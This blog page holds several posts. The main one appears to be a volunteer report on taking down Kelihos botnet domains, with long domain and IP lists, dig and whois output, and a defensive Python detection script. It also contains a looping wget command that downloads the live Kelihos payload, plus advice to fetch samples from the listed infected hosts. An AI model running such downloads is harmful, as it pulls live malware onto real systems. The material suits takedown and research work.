Monday, 2 September 2013

Whether it's those god-awful "fake surveys" that you can rarely get through to get the "leet crack", "free iPhone" etc. from the skiddies that aren't skilled enough to do anything else, or the ad networks that keep allowing companies such as PerformerSoft, or file hosting and redirection sites such as Adf.ly, LinkBucks, FileSwap, Mediafire etc. etc. etc., we keep seeing a plethora of blatantly

Saturday, 31 August 2013

Just an FYI folks, I'm having a few issues with my primary machine at present, so if you've sent me an email over the past couple of weeks, please rest assured, I will get to it as soon as I can (please feel free to re-send it).

I've also fixed at least one issue with the hphosts-partial.asp file. I'm aware of an issue still affecting HostsMan users, and am awaiting a reply from a friend (

Thursday, 8 August 2013

This post is dedicated to the many, so many, wonderful individuals involved in the effort to stand against the Kelihos P2P malware infection. It is an example of WHAT CAN BE DONE when InfoSec people gather to fight a malware infection. This report is entirely the effort of a team whose members simply share the same dream: to free our internet from malware. We cannot list all of your (so many) names, but we all know who you are and what you did. Sincere respect, and thank you very much. Communication was bumpy at first; for the tense and rough exchanges we apologise for every inconvenience. I personally am so happy to live in an era of gentlemen like you! #MalwareMustDie!

First, you need to know what the Kelihos botnet and malware threat is; our previous post gives a good illustration of the threat here-->>[Previous Post]. As you may have noticed in our Twitter timeline, we are doing our best in the battle against the Kelihos malware scum. Yes, we have been haunted by this infection via the RedKit exploit kit, TDSS, direct spam and the botnet's own self-updating function, and this "scum" is still out there, happily infecting us ever after. We just cannot accept that.

Therefore we executed every possible effort that a bunch of volunteers from an NPO entity can make to suppress their growth on the internet. The efforts varied: suspension, sinkholing, DNSBL blocking, VT/URLQuery (etc.) blacklisting and OpenDNS/Google DNS blocking, in parallel with a bunch of reports to the relevant regional authorities (CERTs, Group-IB, ISPs, registrars, ICANN, Microsoft) and to various sinkhole operators.

We received great help and support from the people in the entities mentioned above, and with good delegation of work among our team on Twitter we were able to put up a good fight and achieve some good results within 48+ hours. It is unfair to the people who helped and supported us to let Twitter be the only record of the result, which is why I am posting our effort's report here, together with some tips and tricks used in fighting this infection, on our beloved MalwareMustDie blog.

This post is the report of that effort. Here we go..

1. Stopping the new Kelihos NS based .COM services

By the time we started this effort, Kelihos had switched its DNS from name servers of the form ns[1-6].<7-8 lowercase letters>.ru to .COM domains of the form ns[1-6].<7 lowercase letters>.com (in grep terms: ns[1-6]\.[a-z]\{7,8\}\.ru versus ns[1-6]\.[a-z]\{7\}\.com). We found that all of these domains were registered through INTERNET.BS, a registrar well known for being abused by cybercriminals to register their infector domains. With the great help of the very dedicated individuals mentioned above we took the following domains off the internet:

DUSSEVA.COM
BEUHNIM.COM
GULFKAT.COM
ZUNCHER.COM
FLOWSRE.COM
OMBUGEW.COM
WIDERAT.COM
DAVUJUZ.COM
XEXUMYB.COM
KAROZGI.COM
OSIKKID.COM
NIGUCGU.COM
Below is the PoC of the suspension and sinkholing result:

This is how they got onto the internet:

The following is some of the PoC and hard evidence that the .COM domains Kelihos used appear in the extracted database of domains registered through INTERNET.BS-->>[PASTEBIN]

2. The dismantling effort of .RU infectors

Currently, the main base of the Kelihos infection is .RU ccTLD domains. It is very important to suppress their growth in their home base as well. With great coordination and help from Group-IB we made the effort to dismantle another 101 "NEW" .RU weaponized domains, listed below (format: domain, current A record if any, name servers):

Date: Thu Aug  8 19:54:43 JST 2013

ABJIQFIR.RU,, ns[1-6].karozgi.com
ACXYPZUK.RU,, ns[1-6].karozgi.com
AFEBIRYN.RU,, ns[1-6].karozgi.com
ANGENJEJ.RU,, ns[1-6].karozgi.com
BADMYVOK.RU,, ns[1-6].karozgi.com
BEZGESUK.RU,, ns[1-6].karozgi.com
BITITROJ.RU,, ns[1-6].karozgi.com
BOVEWHAV.RU,, ns[1-6].karozgi.com
BOWRETTI.RU,, ns[1-6].karozgi.com
CICDIWYH.RU,, ns[1-6].karozgi.com
COLYDQEC.RU,, ns[1-6].karozgi.com
CYVWYDJE.RU,, ns[1-6].karozgi.com
DAHADKYZ.RU,, ns[1-6].karozgi.com
DEPCOPUQ.RU,, ns[1-6].karozgi.com
DEQYPPIL.RU,, ns[1-6].karozgi.com
DIICUHXA.RU,, ns[1-6].karozgi.com
EJOPOWOZ.RU,, ns[1-6].karozgi.com
EJQIURMY.RU,, ns[1-6].karozgi.com
FITUZVOF.RU,, ns[1-6].karozgi.com
FOJEGGUF.RU,, ns[1-6].karozgi.com
GAJKUKUC.RU,, ns[1-6].karozgi.com
GECAKCEM.RU,, ns[1-6].karozgi.com
GYCBOKUD.RU,, ns[1-6].karozgi.com
HURVINEV.RU,, ns[1-6].karozgi.com
HUZNEJEX.RU,, ns[1-6].karozgi.com
HYNEQREL.RU,, ns[1-6].karozgi.com
IMKYHTUG.RU,, ns[1-6].karozgi.com
IPXYJYOQ.RU,, ns[1-6].karozgi.com
ITWILMEP.RU,, ns[1-6].karozgi.com
IWKYXSEZ.RU,, ns[1-6].karozgi.com
IXMUTIRI.RU,, ns[1-6].karozgi.com
JAHKUXYV.RU,, ns[1-6].karozgi.com
JEFDYWSO.RU,, ns[1-6].karozgi.com
JIQLIDOX.RU,, ns[1-6].karozgi.com
JOKLASAN.RU,, ns[1-6].karozgi.com
KAPKICOH.RU,, ns[1-6].karozgi.com
KEBWAKQY.RU,, ns[1-6].karozgi.com
KICSIHOP.RU,, ns[1-6].karozgi.com
KIZCIVZE.RU,, ns[1-6].karozgi.com
KUBGYBOH.RU,, ns[1-6].karozgi.com
KYCROTUS.RU,, ns[1-6].karozgi.com
LICLAJLE.RU,, ns[1-6].karozgi.com
LIMJOZEH.RU,, ns[1-6].karozgi.com
LIZECGIJ.RU,, ns[1-6].karozgi.com
LUFRUDET.RU,, ns[1-6].karozgi.com
LUPQUXSE.RU,, ns[1-6].karozgi.com
LYOHGEOF.RU,, ns[1-6].karozgi.com
MAPUHXAF.RU,, ns[1-6].karozgi.com
MOHGOXEB.RU,, ns[1-6].karozgi.com
MYBFABWI.RU,, ns[1-6].karozgi.com
NECUWFEW.RU,, ns[1-6].karozgi.com
NENKUDYF.RU,, ns[1-6].karozgi.com
NICLYCOM.RU,, ns[1-6].karozgi.com
NOJQAVYJ.RU,, ns[1-6].karozgi.com
NORWOLLU.RU,, ns[1-6].karozgi.com
NUKUNNOQ.RU,, ns[1-6].karozgi.com
ONSUGNEM.RU,, ns[1-6].karozgi.com
ORNEVKYC.RU,, ns[1-6].karozgi.com
PEXDAJYP.RU,, ns[1-6].karozgi.com
PIVGEVIT.RU,, ns[1-6].karozgi.com
PIYMNYFA.RU,, ns[1-6].karozgi.com
POWERWIK.RU,, ns[1-6].karozgi.com
PUPUXHEF.RU,, ns[1-6].karozgi.com
PYDAJZYK.RU,, ns[1-6].karozgi.com
QABADPIX.RU,, ns[1-6].karozgi.com
QOFHIRAW.RU,, ns[1-6].karozgi.com
QYSQUWKO.RU,, ns[1-6].karozgi.com
RIFAUTIR.RU,, ns[1-6].karozgi.com
RIZIKCUG.RU,, ns[1-6].karozgi.com
ROVSYMWO.RU,, ns[1-6].karozgi.com
RYTEOPBY.RU,, ns[1-6].karozgi.com
SAWSOBCY.RU,, ns[1-6].karozgi.com
SOMOXBET.RU,, ns[1-6].karozgi.com
TAFIBCUM.RU,, ns[1-6].karozgi.com
TAZGYVAX.RU,, ns[1-6].karozgi.com
TITGOQTE.RU,, ns[1-6].karozgi.com
TYZFOWFE.RU,, ns[1-6].karozgi.com
UWPAYTNU.RU,, ns[1-6].karozgi.com
VEFLOHGY.RU,, ns[1-6].karozgi.com
VEKDEGYL.RU,, ns[1-6].karozgi.com
VUZNIQIK.RU,, ns[1-6].karozgi.com
VYFUXTIS.RU,, ns[1-6].karozgi.com
WANZAWBY.RU,, ns[1-6].karozgi.com
WODYFWOD.RU,, ns[1-6].karozgi.com
WORLIPXO.RU,, ns[1-6].karozgi.com
XAKRYXOG.RU,, ns[1-6].karozgi.com
XIMIRSEX.RU,, ns[1-6].karozgi.com
XIMXAMLI.RU,, ns[1-6].karozgi.com
XUGNEMYQ.RU,, ns[1-6].karozgi.com
YFKYTXIX.RU,, ns[1-6].karozgi.com
YFXIGUSO.RU,, ns[1-6].karozgi.com
YGXEYVXI.RU,, ns[1-6].karozgi.com
YJSEYGFY.RU,, ns[1-6].karozgi.com
YWHYIWDY.RU,, ns[1-6].karozgi.com
ZADNAZVO.RU,, ns[1-6].karozgi.com
ZUNCUHAK.RU,, ns[1-6].karozgi.com
ZUVNENAX.RU,, ns[1-6].karozgi.com
ZUZVAQAW.RU,, ns[1-6].karozgi.com
ZYHIJWIN.RU,, ns[1-6].karozgi.com
ZYRTYDAJ.RU,, ns[1-6].karozgi.com
Their weaponized status, i.e. the A records each domain served to Kelihos/HLUX victims (empty where the domain did not resolve), was recorded as of:
Date: Fri, 2 Aug 2013 11:43:40 -0700 (PDT)

ABJIQFIR.RU,188.209.251.38,
ACXYPZUK.RU,109.89.137.178,
AFEBIRYN.RU,,
ANGENJEJ.RU,,
BADMYVOK.RU,77.122.196.95,
BEZGESUK.RU,77.122.139.203,
BITITROJ.RU,109.191.82.32,
BOVEWHAV.RU,93.79.91.188,
BOWRETTI.RU,,
CICDIWYH.RU,89.229.196.228,
COLYDQEC.RU,46.56.67.7,
CYVWYDJE.RU,190.220.70.5,
DAHADKYZ.RU,178.75.46.67,
DEPCOPUQ.RU,89.149.105.201,
DEQYPPIL.RU,109.87.198.110,
DIICUHXA.RU,95.111.205.207,
EJOPOWOZ.RU,79.112.214.164,
EJQIURMY.RU,188.129.240.79,
FITUZVOF.RU,37.229.99.95,
FOJEGGUF.RU,,
GAJKUKUC.RU,176.37.121.102,
GECAKCEM.RU,77.122.191.111,
GYCBOKUD.RU,176.8.231.155,
HURVINEV.RU,46.237.110.5,
HUZNEJEX.RU,95.65.80.117,
HYNEQREL.RU,94.76.110.237,
IMKYHTUG.RU,37.252.67.195,
IPXYJYOQ.RU,93.79.231.55,
ITWILMEP.RU,,
IWKYXSEZ.RU,178.218.66.19,
IXMUTIRI.RU,109.207.113.126,
JAHKUXYV.RU,46.185.24.210,
JEFDYWSO.RU,93.125.45.196,
JIQLIDOX.RU,109.201.107.204,
JOKLASAN.RU,88.206.28.89,
KAPKICOH.RU,109.207.118.98,
KEBWAKQY.RU,109.251.94.117,
KICSIHOP.RU,77.120.229.169,
KIZCIVZE.RU,86.101.22.28,
KUBGYBOH.RU,77.122.217.253,
KYCROTUS.RU,94.253.45.147,
LICLAJLE.RU,46.33.55.77,
LIMJOZEH.RU,93.126.126.71,
LIZECGIJ.RU,,
LUFRUDET.RU,159.224.76.42,
LUPQUXSE.RU,37.115.91.192,
LYOHGEOF.RU,109.87.162.4,
MAPUHXAF.RU,37.46.226.241,
MOHGOXEB.RU,194.28.4.29,
MYBFABWI.RU,27.49.104.107,
NECUWFEW.RU,94.231.181.24,
NENKUDYF.RU,178.165.23.171,
NICLYCOM.RU,,
NOJQAVYJ.RU,98.193.167.182,
NORWOLLU.RU,178.137.203.149,
NUKUNNOQ.RU,24.49.38.150,
ONSUGNEM.RU,77.85.201.46,
ORNEVKYC.RU,219.70.195.200,
PEXDAJYP.RU,31.128.186.43,
PIVGEVIT.RU,,
PIYMNYFA.RU,46.173.112.16,
POWERWIK.RU,94.244.129.195,
PUPUXHEF.RU,176.8.38.115,
PYDAJZYK.RU,2.68.213.50,
QABADPIX.RU,46.211.63.25,
QOFHIRAW.RU,176.37.121.102,
QYSQUWKO.RU,178.137.72.42,
RIFAUTIR.RU,213.111.69.126,
RIZIKCUG.RU,,
ROVSYMWO.RU,,
RYTEOPBY.RU,89.146.79.57,
SAWSOBCY.RU,,
SOMOXBET.RU,121.129.93.208,
TAFIBCUM.RU,109.87.7.53,
TAZGYVAX.RU,180.110.156.205,
TITGOQTE.RU,189.199.182.2,
TYZFOWFE.RU,,
UWPAYTNU.RU,77.122.227.41,
VEFLOHGY.RU,,
VEKDEGYL.RU,46.173.77.173,
VUZNIQIK.RU,94.230.192.50,
VYFUXTIS.RU,151.0.27.230,
WANZAWBY.RU,212.142.96.18,
WODYFWOD.RU,77.85.201.46,
WORLIPXO.RU,77.121.79.14,
XAKRYXOG.RU,118.160.103.152,
XIMIRSEX.RU,220.137.79.242,
XIMXAMLI.RU,195.24.155.245,
XUGNEMYQ.RU,77.120.179.237,
YFKYTXIX.RU,46.211.85
YFXIGUSO.RU,195.24.155.245,
YGXEYVXI.RU,178.211.139.155,
YJSEYGFY.RU,,
YWHYIWDY.RU,123.236.68.229,
ZADNAZVO.RU,27.6.9.213,
ZUNCUHAK.RU,,
ZUVNENAX.RU,119.14.86.100,
ZUZVAQAW.RU,123.241.73.225,
ZYHIJWIN.RU,178.151.24.58,
ZYRTYDAJ.RU,31.42.119.142,
And the following .RU domains are currently in the blocking effort with OpenDNS and the sinkhole:
EJWOPWYZ.RU,188.27.168.54, ns[1-6].osikkid.com
EKREDTEF.RU,, ns[1-6].osikkid.com
EQGYQTAD.RU,46.250.23.59, ns[1-6].osikkid.com
EVLYLTUX.RU,94.154.224.58, ns[1-6].osikkid.com
FIBLOQAF.RU,, ns[1-6].osikkid.com
FINQIMIG.RU,, ns[1-6].osikkid.com
FOHKYQUW.RU,92.113.255.98, ns[1-6].osikkid.com
FOWAJKUG.RU,, ns[1-6].osikkid.com
FYBYNKEQ.RU,, ns[1-6].osikkid.com
FYDIWGAZ.RU,, ns[1-6].osikkid.com
FYGJUGLI.RU,180.176.172.93, ns[1-6].osikkid.com
FYJTIHOX.RU,, ns[1-6].osikkid.com
FYTUCTOX.RU,, ns[1-6].osikkid.com
GEGDYRAG.RU,, ns[1-6].osikkid.com
GEGMULAD.RU,36.229.82.210, ns[1-6].osikkid.com
GENUVBIZ.RU,, ns[1-6].osikkid.com
GIZROSCA.RU,, ns[1-6].osikkid.com
GUQIDRUV.RU,91.224.168.65, ns[1-6].osikkid.com
HAMOVLOX.RU,, ns[1-6].osikkid.com
HAZLYDUW.RU,85.198.179.73, ns[1-6].osikkid.com
HIHFELGO.RU,, ns[1-6].osikkid.com
HIILOSAB.RU,111.251.91.74, ns[1-6].osikkid.com
HIKKINUF.RU,, ns[1-6].osikkid.com
HOKKINYF.RU,62.231.183.49, ns[1-6].osikkid.com
IVKEUHUW.RU,178.150.244.54, ns[1-6].osikkid.com
IXCUPDAM.RU,124.123.169.123, ns[1-6].osikkid.com
JIBDEFUP.RU,, ns[1-6].osikkid.com
JIXUDRER.RU,, ns[1-6].osikkid.com
JUQUTSAF.RU,112.139.167.48, ns[1-6].osikkid.com
JURLYQYR.RU,129.15.40.86, ns[1-6].osikkid.com
JUVBEBEC.RU,, ns[1-6].osikkid.com
JYHVYCLI.RU,, ns[1-6].osikkid.com
JYSHIWIK.RU,, ns[1-6].osikkid.com
KANRUQYC.RU,, ns[1-6].osikkid.com
KEJIKKIB.RU,77.52.104.119, ns[1-6].osikkid.com
LAWNUPAS.RU,, ns[1-6].osikkid.com
LENEVRYP.RU,, ns[1-6].osikkid.com
LIFNAGCI.RU,, ns[1-6].osikkid.com
LILXAJTE.RU,, ns[1-6].osikkid.com
MEDULZAL.RU,, ns[1-6].osikkid.com
MOJJIQUF.RU,, ns[1-6].osikkid.com
MUBYBLAZ.RU,, ns[1-6].osikkid.com
NADKEWLO.RU,, ns[1-6].osikkid.com
NEQAJDAC.RU,, ns[1-6].osikkid.com
NUJOJPAL.RU,, ns[1-6].osikkid.com
PABOBBAH.RU,, ns[1-6].osikkid.com
PELVOJEL.RU,, ns[1-6].osikkid.com
PEQINNIR.RU,, ns[1-6].osikkid.com
PIGOVFIJ.RU,, ns[1-6].osikkid.com
PYMSILIQ.RU,, ns[1-6].osikkid.com
QAQIQGOD.RU,, ns[1-6].osikkid.com
QEGYRDAD.RU,, ns[1-6].osikkid.com
QEHWOCSI.RU,115.241.91.53, ns[1-6].osikkid.com
RALYMEBU.RU,77.198.70.248, ns[1-6].osikkid.com
RAWPENEP.RU,114.38.44.145, ns[1-6].osikkid.com
RAZCAMIT.RU,37.112.160.119, ns[1-6].osikkid.com
RETUCWYX.RU,, ns[1-6].osikkid.com
RIHSYCVO.RU,213.111.155.5, ns[1-6].osikkid.com
RIZOMCOF.RU,178.74.237.85, ns[1-6].osikkid.com
RYCNISAV.RU,, ns[1-6].osikkid.com
RYGXUQYF.RU,, ns[1-6].osikkid.com
SECZYPRY.RU,46.162.9.40, ns[1-6].osikkid.com
SEPOILOK.RU,, ns[1-6].osikkid.com
SIPVAQBE.RU,188.242.51.78, ns[1-6].osikkid.com
SOKXENBY.RU,37.221.142.107, ns[1-6].osikkid.com
TERUJBIH.RU,, ns[1-6].osikkid.com
TYVWUQAL.RU,, ns[1-6].osikkid.com
UDPYCBEL.RU,, ns[1-6].osikkid.com
UHHUWTEG.RU,, ns[1-6].osikkid.com
UJDOGVIC.RU,, ns[1-6].osikkid.com
UQEBENEW.RU,, ns[1-6].osikkid.com
VESYKVEL.RU,193.107.102.209, ns[1-6].osikkid.com
VUVSIMXO.RU,, ns[1-6].osikkid.com
WYMCEKIN.RU,, ns[1-6].osikkid.com
XUBQOBOH.RU,, ns[1-6].osikkid.com
XUVGYSCI.RU,, ns[1-6].osikkid.com
XYBYHCYZ.RU,, ns[1-6].osikkid.com
XYTFYRSU.RU,, ns[1-6].osikkid.com
ZAGTYCAM.RU,, ns[1-6].osikkid.com
ZEVIJAEF.RU,, ns[1-6].osikkid.com
ZUCFIZME.RU,, ns[1-6].osikkid.com
ZUQTIZYH.RU,, ns[1-6].osikkid.com
ZYCPOHDU.RU,, ns[1-6].osikkid.com
ZYVMYSXA.RU,1.168.215.194, ns[1-6].osikkid.com
Below is the official information received from Group-IB on the SUSPENSION of another 100 Kelihos domains we reported, which was swiftly followed up in less than 48 hours! :-)
Dear Partners,

Group-IB CERT (CERT-GIB) has suspended the following domains:

acbimnik.ru
ajwablet.ru
albodlyc.ru
aqxiwtil.ru
avdicsuw.ru
awpavdog.ru
bevywcoc.ru
bezekqen.ru
bivozhij.ru
cahmydjo.ru
cyjukpym.ru
cyknewyh.ru
cyqsuxon.ru
diijgyan.ru
dyotukci.ru
dyradleq.ru
ejwopwyz.ru
ekredtef.ru
eqgyqtad.ru
evlyltux.ru
fibloqaf.ru
finqimig.ru
fohkyquw.ru
fowajkug.ru
fybynkeq.ru
fydiwgaz.ru
fygjugli.ru
fyjtihox.ru
fytuctox.ru
gegdyrag.ru
gegmulad.ru
genuvbiz.ru
gizrosca.ru
guqidruv.ru
hamovlox.ru
hazlyduw.ru
hihfelgo.ru
hiilosab.ru
hikkinuf.ru
hokkinyf.ru
ivkeuhuw.ru
ixcupdam.ru
jibdefup.ru
jixudrer.ru
juqutsaf.ru
jurlyqyr.ru
juvbebec.ru
jyhvycli.ru
jyshiwik.ru
kanruqyc.ru
kejikkib.ru
lawnupas.ru
lenevryp.ru
lifnagci.ru
lilxajte.ru
medulzal.ru
mojjiquf.ru
mubyblaz.ru
nadkewlo.ru
neqajdac.ru
nujojpal.ru
pabobbah.ru
pelvojel.ru
peqinnir.ru
pigovfij.ru
pymsiliq.ru
qaqiqgod.ru
qegyrdad.ru
qehwocsi.ru
ralymebu.ru
rawpenep.ru
razcamit.ru
retucwyx.ru
rihsycvo.ru
rizomcof.ru
rycnisav.ru
rygxuqyf.ru
seczypry.ru
sepoilok.ru
sipvaqbe.ru
sokxenby.ru
terujbih.ru
tyvwuqal.ru
udpycbel.ru
uhhuwteg.ru
ujdogvic.ru
uqebenew.ru
vesykvel.ru
vuvsimxo.ru
wymcekin.ru
xubqoboh.ru
xuvgysci.ru
xybyhcyz.ru
xytfyrsu.ru
zagtycam.ru
zevijaef.ru
zucfizme.ru
zuqtizyh.ru
zycpohdu.ru
zyvmysxa.ru

3. How we PoC an NS infector in commercial TLD

This is how we always PoC a new infector in the wild. We share it as know-how so that everyone can spot and report new infections. Our PoC for OSIKKID.COM is as follows:

'(1) It spreads HLUX, as the checks below show:'

bash-3.2$ date
Thu Aug 8 12:57:18 JST 2013

// the HLUX IPs (each answer is a different infected host)..

bash-3.2$ while true; do dig +short OSIKKID.COM; sleep 1; done
119.14.28.104
218.166.2.199
125.215.84.135
77.123.42.134
183.72.199.4
36.234.222.167
114.38.198.134
117.197.230.88
95.30.210.87
160.75.9.240
46.250.101.113
175.111.40.232
46.250.99.105
[...]

'(2) Serving the Kelihos payload malware'
Every A record is serving the Kelihos payload:
// Below is the current download PoC:

bash-3.2$ while true; do wget h00p://OSIKKID.COM/rasta01.exe; sleep 1; done
--2013-08-08 12:59:14-- h00p://osikkid.com/rasta01.exe
Resolving osikkid.com... 89.136.131.41
Connecting to osikkid.com|89.136.131.41|:80... connected.
HTTP request sent, awaiting response... 200
Length: 1221261 (1.2M) []
Saving to: ‘rasta01.exe’
100%
Last-modified header invalid -- time-stamp ignored.
2013-08-08 12:59:22 (260 KB/s) - ‘rasta01.exe’ saved [1221261/1221261]

--2013-08-08 12:59:42-- h00p://osikkid.com/rasta01.exe
Resolving osikkid.com... 124.111.249.204
Connecting to osikkid.com|124.111.249.204|:80... connected.
HTTP request sent, awaiting response... 200
Length: 1221261 (1.2M) []
Saving to: ‘rasta01.exe.2’
Last-modified header invalid -- time-stamp ignored.
2013-08-08 12:59:53 (1003 KB/s) - ‘rasta01.exe.2’ saved [1221261/1221261]
[...]

'(3) Registration through INTERNET.BS is the current MO.'
This is proven by the registration record of these domains.
We remotely extracted the list of domains registered through INTERNET.BS
from today back to June 1st, and this domain is one of them:

bash-3.2$ whois osikkid.com
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: OSIKKID.COM
Registrar: INTERNET.BS CORP.
Whois Server: whois.internet.bs
Referral URL: http://www.internet.bs
Name Server: NS1.OSIKKID.COM
Name Server: NS2.OSIKKID.COM
Name Server: NS3.OSIKKID.COM
Name Server: NS4.OSIKKID.COM
Name Server: NS5.OSIKKID.COM
Name Server: NS6.OSIKKID.COM
Status: clientTransferProhibited
Updated Date: 06-aug-2013
Creation Date: 18-jun-2013
Expiration Date: 18-jun-2014
>>> Last update of whois database: Thu, 08 Aug 2013 04:03:30 UTC <<<

'(4) The DNS services are linked to the Kelihos NS services reported previously:'

The name servers of this domain share addresses with the NS hosts reported previously:
ns1.OSIKKID.COM = ns3.davujuz.com
ns2.OSIKKID.COM = ns5.ns4, ns2.ns4.ombugew.com
ns3.OSIKKID.COM = ns1.davujuz.com
...and so on...

'(5) The infections raised in .RU are caused by the OSIKKID.COM NS servers:'
The 100 .RU domains need to be blocked following the same pattern we previously reported to Group-IB, under REGGI.RU (and FYI, the abuse of .RU by Kelihos amounts to more than 12,000 domains, not counting these...).
This is the PoC that the .RU domains were registered in the last couple of days (created 2013.08.06) under the OSIKKID.COM NS:
domain: ACBIMNIK.RU
nserver: ns1.osikkid.com.
nserver: ns2.osikkid.com.
nserver: ns3.osikkid.com.
nserver: ns4.osikkid.com.
nserver: ns5.osikkid.com.
nserver: ns6.osikkid.com.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.08.06
paid-till: 2014.08.06
free-date: 2014.09.06

Below is the check of the reported .RU domains affiliated with the OSIKKID.COM NS, cross-referenced by IP and DNS:

ACBIMNIK.RU,, ns1.osikkid.com.
ns2.osikkid.com.
ns3.osikkid.com.
ns4.osikkid.com.
ns5.osikkid.com.
ns6.osikkid.com.
AJWABLET.RU,123.240.108.221, ns1.osikkid.com.
ns2.osikkid.com.
ns3.osikkid.com.
ns4.osikkid.com.
ns5.osikkid.com.
ns6.osikkid.com.
ALBODLYC.RU,, ns1.osikkid.com.
ns2.osikkid.com.
ns3.osikkid.com.
ns4.osikkid.com.
ns5.osikkid.com.
ns6.osikkid.com.
[...]
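The five checks above can be turned into a repeatable script. The Python below is an added example, not MalwareMustDie's own tooling: it re-implements checks (1), (3), (4) and (5) offline on captured command output, with the `dig +short` answers and abridged .COM and .RU whois records copied from the captures in this post and embedded as constants. Check (2), downloading the payload from each A record, is deliberately left out because it needs network access and pulls live malware; run that in a sandbox with wget as shown above. The `ns[1-6].<7-8 letters>.<tld>` regex and the thresholds in `fastflux_summary` are my assumptions, not the project's.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed inputs: the `dig +short` answers and (abridged) whois records captured above.
DIG_SHORT_SAMPLE = """\
119.14.28.104
218.166.2.199
125.215.84.135
77.123.42.134
183.72.199.4
36.234.222.167
114.38.198.134
117.197.230.88
95.30.210.87
160.75.9.240
46.250.101.113
175.111.40.232
46.250.99.105
"""
WHOIS_COM_SAMPLE = """\
Domain Name: OSIKKID.COM
Registrar: INTERNET.BS CORP.
Name Server: NS1.OSIKKID.COM
Name Server: NS2.OSIKKID.COM
Name Server: NS3.OSIKKID.COM
Creation Date: 18-jun-2013
"""
WHOIS_RU_SAMPLE = """\
domain: ACBIMNIK.RU
nserver: ns1.osikkid.com.
nserver: ns2.osikkid.com.
nserver: ns3.osikkid.com.
registrar: REGGI-REG-RIPN
created: 2013.08.06
"""
# NS hosts of the form ns[1-6].<7-8 letters>.<com|ru>, the pattern identified above (assumed regex).
KELIHOS_NS = re.compile(r"^ns[1-6]\.([a-z]{7,8})\.(com|ru)$")


def parse_dig_short(text):
    """IPv4 addresses from `dig +short` output, in order; blank lines and CNAME targets skipped."""
    ips = []
    for line in text.splitlines():
        line = line.strip()
        try:
            if line and ip_address(line).version == 4:
                ips.append(line)
        except ValueError:
            pass
    return ips


def fastflux_summary(ips, min_unique=8):
    """Check (1): count distinct addresses and distinct /16s. A real web host answers with
    one or two stable IPs; a Kelihos name hands out a different infected host per query."""
    unique = sorted(set(ips))
    nets16 = {str(ip_network(ip + "/16", strict=False)) for ip in unique}
    return {"unique_ips": len(unique), "unique_slash16": len(nets16),
            "fastflux": len(unique) >= min_unique and len(nets16) >= min_unique // 2}


def parse_whois(text):
    """Check (3): registrar, name servers and creation date from an InterNIC-style .COM
    record (`Registrar:`/`Name Server:`) or a RIPN-style .RU record (`registrar:`/`nserver:`)."""
    info = {"registrar": None, "nservers": [], "created": None}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Za-z -]+?):\s*(.+?)\s*$", line)
        if not m:
            continue
        key, val = m.group(1).strip().lower(), m.group(2)
        if key == "registrar":
            info["registrar"] = val
        elif key in ("name server", "nserver"):
            info["nservers"].append(val.lower().rstrip("."))
        elif key in ("creation date", "created"):
            info["created"] = val
    return info


def ns_parents(nservers):
    """Check (4): ns3.osikkid.com -> osikkid.com for every NS host matching the pattern,
    so domains can be linked through the NS domains they share."""
    parents = set()
    for ns in nservers:
        m = KELIHOS_NS.match(ns.lower().rstrip("."))
        if m:
            parents.add(m.group(1) + "." + m.group(2))
    return parents


def ru_linked_to(ru_whois_text, known_ns_domains):
    """Check (5): which already-reported NS domains a fresh .RU registration delegates to."""
    return ns_parents(parse_whois(ru_whois_text)["nservers"]) & {d.lower() for d in known_ns_domains}


def poc_verdict(domain, dig_text, com_whois_text, ru_whois_text):
    """All offline checks for one suspected .COM NS infector; check (2) (payload download)
    is left to a sandboxed wget run."""
    com = parse_whois(com_whois_text)
    checks = {
        "fastflux_a_records": fastflux_summary(parse_dig_short(dig_text))["fastflux"],
        "internet_bs_registrar": (com["registrar"] or "").upper().startswith("INTERNET.BS"),
        "self_hosted_ns": ns_parents(com["nservers"]) == {domain.lower()},
        "ru_domains_delegate_here": domain.lower() in ru_linked_to(ru_whois_text, [domain]),
    }
    checks["report_worthy"] = all(checks.values())
    return checks
```

Feed it live data by passing the text of `dig +short <domain>` (run in a loop, as above, to collect several answers) and of `whois <domain>` to the same functions. A domain that trips all four checks, plus a sandboxed download confirming the payload, is exactly what this post reports to the registrar and to Group-IB; a name that resolves to one stable address and is delegated to a well-known DNS provider should not be reported on the strength of the NS naming pattern alone.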

4. Monitoring The Actual Infection Range

As of today, before the NS sinkholing took effect, with the great effort of our members we are monitoring 1,287 IP addresses actively distributing the Kelihos malware payload all over the world, as listed in our pastebin here-->>[LINK]

You can append /rasta01.exe to the IP to get the latest Kelihos payload sample for your research, as in the sample below:

The binary file names below can also be used for the same monitoring purpose:

/keybex4.exe
/bljat01.exe
/cuper01.exe
/rasta01.exe
/calc.exe

These infections are plotted in a good graphical interface by Chris J Wilson, as below:

Infection per ASN:

Infection per country:

Epilogue

The effort is not stopping now.. see below:

And what FAST action from our friends!! See the timestamps in the tweets; it is AMAZING to suspend and sinkhole malware domains THAT fast! :-)) (you guys rock!!)
We are working hard on breaking this "Kelihos" legend methodically, and the method works!
Don't ever let the Kelihos scum onto the internet! Spot and stop them instantly, and cooperate with the abused registrar to get the new infectors into sinkholes and the new domains suspended immediately.
Their weakness is in their DNS: these name servers are the backbone of the payload distribution across thousands of IPs and infector domains, and those DNS servers sit on static addresses on machines that cannot easily be removed. This IS a target to be shut down!
So, DO NOT let those NS hosts get any domains on our internet! Shifting their DNS is not easy for them; it hurts them badly, and they have to change the name server domains again and again. Right now they need non-.RU domains for their DNS to keep their botnet alive longer.
Let's build a procedure to SPOT, BLOCK, SUSPEND and CLEAN UP in one combined flow!
We need your help and your support in coordinating the effort to suppress the Kelihos botnet. Please cooperate!

Recent Updates

And the registrar also cooperated beforehand, without waiting for the sinkhole :-) Thank you!

Our friend Chris J Wilson made great statistics of the latest infection data:

Country-based infection data:

AS-number-based infection data:

Terrific world map of the infection by Chris J Wilson:

Graph URL is here-->>[LINK]

After .COM the Kelihos morons shifted to .ME, .ORG and .INFO.
An idiotic and pathetic act; they don't know whom they are dealing with now..


#MalwareMustDie!

Wednesday, 7 August 2013

The hpHOSTS Hosts file has been updated. There is now a total of 218,563 listed hostnames.
If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
Latest Updated: 07/08/2013 16:19
